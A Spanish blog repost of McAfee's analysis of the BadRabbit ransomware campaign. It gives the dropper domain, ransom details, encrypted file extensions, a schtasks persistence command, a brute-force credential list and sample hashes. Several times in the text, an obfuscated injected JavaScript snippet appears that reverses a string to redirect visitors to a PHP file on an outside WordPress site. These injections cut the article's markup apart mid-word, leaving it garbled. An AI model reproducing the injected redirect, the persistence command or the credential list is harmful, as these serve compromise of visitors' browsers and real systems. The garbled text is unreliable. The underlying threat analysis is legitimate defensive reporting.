Y ESTE ES EL ARTICULO DE McAfee SOBRE EL BAD RABBIT
Esta publicación fue investigada y escrita por Christiaan Beek, Tim Hux, David Marcus, Charles McFarland, Douglas McKee y Raj Samani.
McAfee está investigando actualmente una campaña de ransomware conocida como BadRabbit, que inicialmente infectó objetivos en Rusia y Ucrania. También estamos investigando informes de sistemas infectados en Alemania, Turquía y Bulgaria y proporcionaremos actualizaciones a medida que haya más información disponible.
Cuando las víctimas visitan el siguiente sitio, se descarga un dropper (fichero que contiene el malware, sin necesidad de descargarlo como los downloaders):
hxxp: // 1dnscontrol [punto] com / flash_install.php
Después de la infección, la víctima ve la siguiente pantalla:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tomorrow.mcafee.com/wp-content/uploads/2017/10/20171024-BadRabbit-1.jpg” width=”720″ height=”398″ /></p>
<p> </p>
<p>El ransomware actualmente está pidiendo de entrada 0.05 Bitcoin; sin embargo, no hay confirmación de que pagar el rescate dé como resultado que se proporcione una clave de descifrado.</p>
<p>Un sitio de descifrado en el siguiente dominio .onion (Tor) muestra el tiempo que las víctimas han dejado antes de que el precio suba:</p>
<p>caforssztxqzf2nm [pun<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to] onion
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tomorrow.mcafee.com/wp-content/uploads/2017/10/20171024-BadRabbit-2.png” width=”1430″ height=”969″ /></p>
<p>Los archivos con las siguientes extensiones están encriptados:</p>
<p>.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf .der .dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg .nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1 .pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx .vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.</p>
<p>El malware inicia una línea de comandos con los siguientes valores:</p>
<p>Cmd /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR “C:\Windows\system32\cmd.exe /C Start \”\” \”C:\Windows\dispci.exe\” -id 1082924949 && exit”</p>
<p>“/ TN rheagal” se refiere a una cuenta del sistema con el nombre rhaegal utilizado para crear la tarea programada e iniciar el archivo ransomware dispci.exe. Rhaegal probablemente sea una referencia a un dragón del popular programa de televisión “Game of Thrones”. De hecho, tres nombres de dragón -Rhaegal, Viserion y Drogon- se usan en relación con las siguientes tareas programadas:</p>
<p><img decoding=)
todos los cambios realizados en los archivos en el volumen, de acuerdo con la red de desarrolladores de Microsoft. A medida que se agregan, eliminan y modifican archivos, directorios y otros objetos NTFS, NTFS ingresa los registros en el diario de cambios USN, uno para cada volumen en la computadora. Cada registro indica el tipo de cambio y el objeto cambiado. Se añaden nuevos registros al final de la secuencia.
También encontramos una consulta de DNS para ACA807 (x) ipt.aol [punto] com, en la cual el “##” es un número hexadecimal de dos dígitos de 00-FF ACA807 ##. Ipt.aol [punto] com.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tomorrow.mcafee.com/wp-content/uploads/2017/10/20171024-BadRabbit-4.jpg” width=”1429″ height=”250″ /></p>
<p>Creamos un gráfico de los even<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tos que ocurren durante una infección por una de las muestras de BadRabbit. El binario inicial se carga en la memoria y mata el proceso inicial. Otros procesos eliminan la configuración, los archivos de servicios y otros artefactos utilizados en los ataques. El gráfico finaliza con la creación de las tareas programadas anteriores.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tomorrow.mcafee.com/wp-content/uploads/2017/10/20171024-BadRabbit-5-1501×500.jpg” width=”1501″ height=”500″ /></p>
<p>Credenciales incorporadas</p>
<p>Una de las muestras (579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648) parece contener una lista de credenciales predeterminadas con un inten<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to de aplicar fuerza bruta a las credenciales y obtener las tareas programadas para ejecutar el ransomware:
secret
123321
zxc321
zxc123
qwerty123
qwerty
qwe321
qwe123
111111
password
test123
admin123Test123
Admin123
user123
User123
guest123
Guest123
administrator123
Administrator123
1234567890
123456789
12345678
1234567
123456
adminTest
administrator
netguest
superuser
nasadmin
nasuser
ftpadmin
ftpuser
backup
operator
other user
support
manager
rdpadmin
rdpuser
user-1
Administrator
¿Fans del JUEGO DE TRONOS?
Es común que los atacantes utilicen referencias de cultura pop en sus ataques. Estos atacantes parecen estar interesados en “Game of Thrones” (JUEGO DE TRONOS), con al menos tres referencias a la serie. Viserion, Rhaegal y Drogon son nombres de tareas programadas. GrayWorm, el nombre de un comandante de “Game of Thrones”, es el nombre del producto en los datos EXIF del binario.
Detección
Actualmente hay tres muestras asociadas con esta campaña de ransomware, que representan el dropper y el ejecutable principal:
630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da
8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93 (fichero dispci.exe)
579fd8a0385482fb4c789561a30b09f25671e86422f40ef5cca2036b28f99648
saludos
ms, 26-10-2017
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.